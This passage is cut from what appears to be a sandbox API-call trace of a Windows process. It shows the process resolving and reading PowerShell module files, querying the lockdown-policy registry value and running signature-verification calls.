lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\PSWorkflowUtility" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\psworkflowutility"), fInfoLevelId=0x0, lpFileInformation=0x4ebee20 | out: lpFileInformation=0x4ebee20*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x24b437c0, ftCreationTime.dwHighDateTime=0x1d706a5, ftLastAccessTime.dwLowDateTime=0x24b437c0, ftLastAccessTime.dwHighDateTime=0x1d706a5, ftLastWriteTime.dwLowDateTime=0x24b437c0, ftLastWriteTime.dwHighDateTime=0x1d706a5, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0089.149] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb58) returned 1 [0089.149] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\TroubleshootingPack", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x47 [0089.149] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\TroubleshootingPack", nBufferLength=0x47, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\TroubleshootingPack", lpFilePart=0x0) returned 0x46 [0089.150] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb5c) returned 1 [0089.150] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\TroubleshootingPack" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\troubleshootingpack"), fInfoLevelId=0x0, lpFileInformation=0x4ebee20 | out: lpFileInformation=0x4ebee20*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe4f50ebe, ftCreationTime.dwHighDateTime=0x1ca043e, ftLastAccessTime.dwLowDateTime=0x919bae56, ftLastAccessTime.dwHighDateTime=0x1cbf8b7, ftLastWriteTime.dwLowDateTime=0x919bae56, ftLastWriteTime.dwHighDateTime=0x1cbf8b7, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0089.150] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb58) returned 1 [0089.150] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebee0c) returned 1 [0089.150] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x50 [0089.150] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility", nBufferLength=0x50, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility", lpFilePart=0x0) returned 0x4f [0089.151] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\*", lpFindFileData=0x4ebebbc | out: lpFindFileData=0x4ebebbc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x24bb5be0, ftCreationTime.dwHighDateTime=0x1d706a5, ftLastAccessTime.dwLowDateTime=0x24bb5be0, ftLastAccessTime.dwHighDateTime=0x1d706a5, ftLastWriteTime.dwLowDateTime=0x24bb5be0, ftLastWriteTime.dwHighDateTime=0x1d706a5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x34d440 [0089.151] FindNextFileW (in: hFindFile=0x34d440, lpFindFileData=0x4ebebc4 | out: lpFindFileData=0x4ebebc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x24bb5be0, ftCreationTime.dwHighDateTime=0x1d706a5, ftLastAccessTime.dwLowDateTime=0x24bb5be0, ftLastAccessTime.dwHighDateTime=0x1d706a5, ftLastWriteTime.dwLowDateTime=0x24bb5be0, ftLastWriteTime.dwHighDateTime=0x1d706a5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0089.151] FindNextFileW (in: hFindFile=0x34d440, lpFindFileData=0x4ebebc4 | out: lpFindFileData=0x4ebebc4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd7a09930, ftCreationTime.dwHighDateTime=0x1d706a2, ftLastAccessTime.dwLowDateTime=0xd7a09930, ftLastAccessTime.dwHighDateTime=0x1d706a2, ftLastWriteTime.dwLowDateTime=0x2f20f74b, ftLastWriteTime.dwHighDateTime=0x1d21d40, nFileSizeHigh=0x0, nFileSizeLow=0x982, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Utility.psd1", cAlternateFileName="")) returned 1 [0089.151] FindNextFileW (in: hFindFile=0x34d440, lpFindFileData=0x4ebebc4 | out: lpFindFileData=0x4ebebc4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd6d3e2f0, ftCreationTime.dwHighDateTime=0x1d706a2, ftLastAccessTime.dwLowDateTime=0xd6d3e2f0, ftLastAccessTime.dwHighDateTime=0x1d706a2, ftLastWriteTime.dwLowDateTime=0x2f214576, ftLastWriteTime.dwHighDateTime=0x1d21d40, nFileSizeHigh=0x0, nFileSizeLow=0x7778, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Utility.psm1", cAlternateFileName="")) returned 1 [0089.151] FindNextFileW (in: hFindFile=0x34d440, lpFindFileData=0x4ebebc4 | out: lpFindFileData=0x4ebebc4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd6d3e2f0, ftCreationTime.dwHighDateTime=0x1d706a2, ftLastAccessTime.dwLowDateTime=0xd6d3e2f0, ftLastAccessTime.dwHighDateTime=0x1d706a2, ftLastWriteTime.dwLowDateTime=0x2f214576, ftLastWriteTime.dwHighDateTime=0x1d21d40, nFileSizeHigh=0x0, nFileSizeLow=0x7778, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Utility.psm1", cAlternateFileName="")) returned 0 [0089.151] FindClose (in: hFindFile=0x34d440 | out: hFindFile=0x34d440) returned 1 [0089.151] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb7c) returned 1 [0089.151] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeddc) returned 1 [0089.151] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psd1")) returned 0x20 [0089.152] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x72 [0089.152] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", nBufferLength=0x72, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", lpFilePart=0x0) returned 0x71 [0089.152] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x72 [0089.152] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", nBufferLength=0x72, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", lpFilePart=0x0) returned 0x71 [0089.152] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebeb84) returned 1 [0089.152] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psd1"), fInfoLevelId=0x0, lpFileInformation=0x67f22dc | out: lpFileInformation=0x67f22dc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd7a09930, ftCreationTime.dwHighDateTime=0x1d706a2, ftLastAccessTime.dwLowDateTime=0xd7a09930, ftLastAccessTime.dwHighDateTime=0x1d706a2, ftLastWriteTime.dwLowDateTime=0x2f20f74b, ftLastWriteTime.dwHighDateTime=0x1d21d40, nFileSizeHigh=0x0, nFileSizeLow=0x982)) returned 1 [0089.152] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebeb80) returned 1 [0089.152] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x72 [0089.152] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", nBufferLength=0x72, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", lpFilePart=0x0) returned 0x71 [0089.152] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebecec) returned 1 [0089.153] CreateFileW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psd1"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x468 [0089.153] GetFileType (hFile=0x468) returned 0x1 [0089.153] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebece8) returned 1 [0089.153] GetFileType (hFile=0x468) returned 0x1 [0089.153] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebed28*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebed28*=0) returned 0x0 [0089.153] ReadFile (in: hFile=0x468, lpBuffer=0x67f30ec, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebed54, lpOverlapped=0x0 | out: lpBuffer=0x67f30ec*, lpNumberOfBytesRead=0x4ebed54*=0x982, lpOverlapped=0x0) returned 1 [0089.155] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebed28*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebed28*=0) returned 0x982 [0089.155] ReadFile (in: hFile=0x468, lpBuffer=0x67f260e, nNumberOfBytesToRead=0x27e, lpNumberOfBytesRead=0x4ebed54, lpOverlapped=0x0 | out: lpBuffer=0x67f260e*, lpNumberOfBytesRead=0x4ebed54*=0x0, lpOverlapped=0x0) returned 1 [0089.155] SetFilePointer (in: hFile=0x468, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebed28*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebed28*=0) returned 0x982 [0089.155] ReadFile (in: hFile=0x468, lpBuffer=0x67f30ec, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebed54, lpOverlapped=0x0 | out: lpBuffer=0x67f30ec*, lpNumberOfBytesRead=0x4ebed54*=0x0, lpOverlapped=0x0) returned 1 [0089.155] CloseHandle (hObject=0x468) returned 1 [0089.157] CoCreateGuid (in: pguid=0x4ebee54 | out: pguid=0x4ebee54*(Data1=0xf7a620fb, Data2=0x2f2d, Data3=0x48c3, Data4=([0]=0x8e, [1]=0xd4, [2]=0x5f, [3]=0xbf, [4]=0x86, [5]=0xeb, [6]=0xce, [7]=0x8e))) returned 0x0 [0089.157] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x468 [0089.157] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x4f0 [0089.158] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x4f4 [0089.158] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x4f8 [0089.158] SetEvent (hEvent=0x4f8) returned 1 [0089.158] SetEvent (hEvent=0x468) returned 1 [0089.158] SetEvent (hEvent=0x4f0) returned 1 [0089.158] SetEvent (hEvent=0x4f4) returned 1 [0089.158] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x4fc [0089.159] SetThreadUILanguage (LangId=0x0) returned 0x409 [0089.210] EtwEventActivityIdControl () returned 0x0 [0089.210] EtwEventActivityIdControl () returned 0x0 [0089.210] EtwEventActivityIdControl () returned 0x0 [0089.224] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psd1")) returned 0x20 [0089.225] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x72 [0089.225] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", nBufferLength=0x72, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", lpFilePart=0x0) returned 0x71 [0089.225] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebe680) returned 1 [0089.225] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psd1"), fInfoLevelId=0x0, lpFileInformation=0x4ebe944 | out: lpFileInformation=0x4ebe944*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd7a09930, ftCreationTime.dwHighDateTime=0x1d706a2, ftLastAccessTime.dwLowDateTime=0xd7a09930, ftLastAccessTime.dwHighDateTime=0x1d706a2, ftLastWriteTime.dwLowDateTime=0x2f20f74b, ftLastWriteTime.dwHighDateTime=0x1d21d40, nFileSizeHigh=0x0, nFileSizeLow=0x982)) returned 1 [0089.225] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebe67c) returned 1 [0089.225] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psd1")) returned 0x20 [0089.225] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x72 [0089.225] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", nBufferLength=0x72, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", lpFilePart=0x0) returned 0x71 [0089.225] NtQuerySystemInformation (in: SystemInformationClass=0xa4, SystemInformation=0x4ebe588, Length=0x20, ResultLength=0x4ebe5f8 | out: SystemInformation=0x4ebe588, ResultLength=0x4ebe5f8*=0x0) returned 0xc0000003 [0089.226] GetSystemInfo (in: lpSystemInfo=0x4ebe604 | out: lpSystemInfo=0x4ebe604*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) [0089.226] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x4ebe594 | out: phkResult=0x4ebe594*=0x500) returned 0x0 [0089.226] RegQueryValueExW (in: hKey=0x500, lpValueName="__PSLockdownPolicy", lpReserved=0x0, lpType=0x4ebe5b0, lpData=0x0, lpcbData=0x4ebe5ac*=0x0 | out: lpType=0x4ebe5b0*=0x0, lpData=0x0, lpcbData=0x4ebe5ac*=0x0) returned 0x2 [0089.226] RegCloseKey (hKey=0x500) returned 0x0 [0089.226] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x72 [0089.226] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", nBufferLength=0x72, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", lpFilePart=0x0) returned 0x71 [0089.226] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebe50c) returned 1 [0089.227] CreateFileW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psd1"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x500 [0089.227] GetFileType (hFile=0x500) returned 0x1 [0089.227] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebe508) returned 1 [0089.227] GetFileType (hFile=0x500) returned 0x1 [0089.227] SetFilePointer (in: hFile=0x500, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebe548*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebe548*=0) returned 0x0 [0089.227] ReadFile (in: hFile=0x500, lpBuffer=0x6826be8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebe574, lpOverlapped=0x0 | out: lpBuffer=0x6826be8*, lpNumberOfBytesRead=0x4ebe574*=0x982, lpOverlapped=0x0) returned 1 [0089.227] SetFilePointer (in: hFile=0x500, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebe548*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebe548*=0) returned 0x982 [0089.228] ReadFile (in: hFile=0x500, lpBuffer=0x68260fe, nNumberOfBytesToRead=0x27e, lpNumberOfBytesRead=0x4ebe574, lpOverlapped=0x0 | out: lpBuffer=0x68260fe*, lpNumberOfBytesRead=0x4ebe574*=0x0, lpOverlapped=0x0) returned 1 [0089.228] SetFilePointer (in: hFile=0x500, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebe548*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebe548*=0) returned 0x982 [0089.228] ReadFile (in: hFile=0x500, lpBuffer=0x6826be8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebe574, lpOverlapped=0x0 | out: lpBuffer=0x6826be8*, lpNumberOfBytesRead=0x4ebe574*=0x0, lpOverlapped=0x0) returned 1 [0089.228] NtQuerySystemInformation (in: SystemInformationClass=0xa4, SystemInformation=0x4ebe4dc, Length=0x20, ResultLength=0x4ebe54c | out: SystemInformation=0x4ebe4dc, ResultLength=0x4ebe54c*=0x0) returned 0xc0000003 [0089.228] GetSystemInfo (in: lpSystemInfo=0x4ebe558 | out: lpSystemInfo=0x4ebe558*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) [0089.230] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x4ebe4e8 | out: phkResult=0x4ebe4e8*=0x504) returned 0x0 [0089.230] RegQueryValueExW (in: hKey=0x504, lpValueName="__PSLockdownPolicy", lpReserved=0x0, lpType=0x4ebe504, lpData=0x0, lpcbData=0x4ebe500*=0x0 | out: lpType=0x4ebe504*=0x0, lpData=0x0, lpcbData=0x4ebe500*=0x0) returned 0x2 [0089.230] RegCloseKey (hKey=0x504) returned 0x0 [0089.230] CloseHandle (hObject=0x500) returned 1 [0089.231] CoCreateGuid (in: pguid=0x4ebe5d8 | out: pguid=0x4ebe5d8*(Data1=0x36f05155, Data2=0x859d, Data3=0x4658, Data4=([0]=0xb5, [1]=0xe5, [2]=0x73, [3]=0x54, [4]=0x6, [5]=0x20, [6]=0x97, [7]=0x4a))) returned 0x0 [0089.231] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebe338 | out: lpPerformanceCount=0x4ebe338*=1641204809075) returned 1 [0089.232] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x72 [0089.232] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", nBufferLength=0x72, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", lpFilePart=0x0) returned 0x71 [0089.232] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebe024) returned 1 [0089.232] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psd1"), fInfoLevelId=0x0, lpFileInformation=0x4ebe2e8 | out: lpFileInformation=0x4ebe2e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd7a09930, ftCreationTime.dwHighDateTime=0x1d706a2, ftLastAccessTime.dwLowDateTime=0xd7a09930, ftLastAccessTime.dwHighDateTime=0x1d706a2, ftLastWriteTime.dwLowDateTime=0x2f20f74b, ftLastWriteTime.dwHighDateTime=0x1d21d40, nFileSizeHigh=0x0, nFileSizeLow=0x982)) returned 1 [0089.232] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebe020) returned 1 [0089.232] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x72 [0089.232] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", nBufferLength=0x72, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", lpFilePart=0x0) returned 0x71 [0089.232] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x72 [0089.232] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", nBufferLength=0x72, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", lpFilePart=0x0) returned 0x71 [0089.232] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebdfb8) returned 1 [0089.232] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psd1"), fInfoLevelId=0x0, lpFileInformation=0x4ebe27c | out: lpFileInformation=0x4ebe27c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd7a09930, ftCreationTime.dwHighDateTime=0x1d706a2, ftLastAccessTime.dwLowDateTime=0xd7a09930, ftLastAccessTime.dwHighDateTime=0x1d706a2, ftLastWriteTime.dwLowDateTime=0x2f20f74b, ftLastWriteTime.dwHighDateTime=0x1d21d40, nFileSizeHigh=0x0, nFileSizeLow=0x982)) returned 1 [0089.232] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebdfb4) returned 1 [0089.232] CoTaskMemAlloc (cb=0x10) returned 0x425e6b8 [0089.233] CoTaskMemAlloc (cb=0x10) returned 0x425e6e8 [0089.233] CoTaskMemAlloc (cb=0xe4) returned 0x33cef8 [0089.233] CoTaskMemAlloc (cb=0x30) returned 0x4248690 [0089.233] WinVerifyTrust () returned 0x800b0100 [0089.243] CoTaskMemFree (pv=0x425e6b8) [0089.243] CoTaskMemFree (pv=0x4248690) [0089.243] CryptCATHandleFromStore () returned 0x2bf9b8 [0089.244] WTHelperGetProvSignerFromChain () returned 0x0 [0089.244] CoTaskMemAlloc (cb=0x10) returned 0x425e6b8 [0089.244] CoTaskMemAlloc (cb=0x30) returned 0x4248690 [0089.244] WinVerifyTrust () returned 0x0 [0089.244] CoTaskMemFree (pv=0x4248690) [0089.244] CoTaskMemFree (pv=0x425e6b8) [0089.244] CoTaskMemFree (pv=0x33cef8) [0089.244] CoTaskMemFree (pv=0x425e6e8) [0089.284] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\en-US\\Microsoft.PowerShell.Utility.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\en-us\\microsoft.powershell.utility.psd1")) returned 0xffffffff [0089.285] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\en\\Microsoft.PowerShell.Utility.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\en\\microsoft.powershell.utility.psd1")) returned 0xffffffff [0089.285] GetFullPathNameW (in: 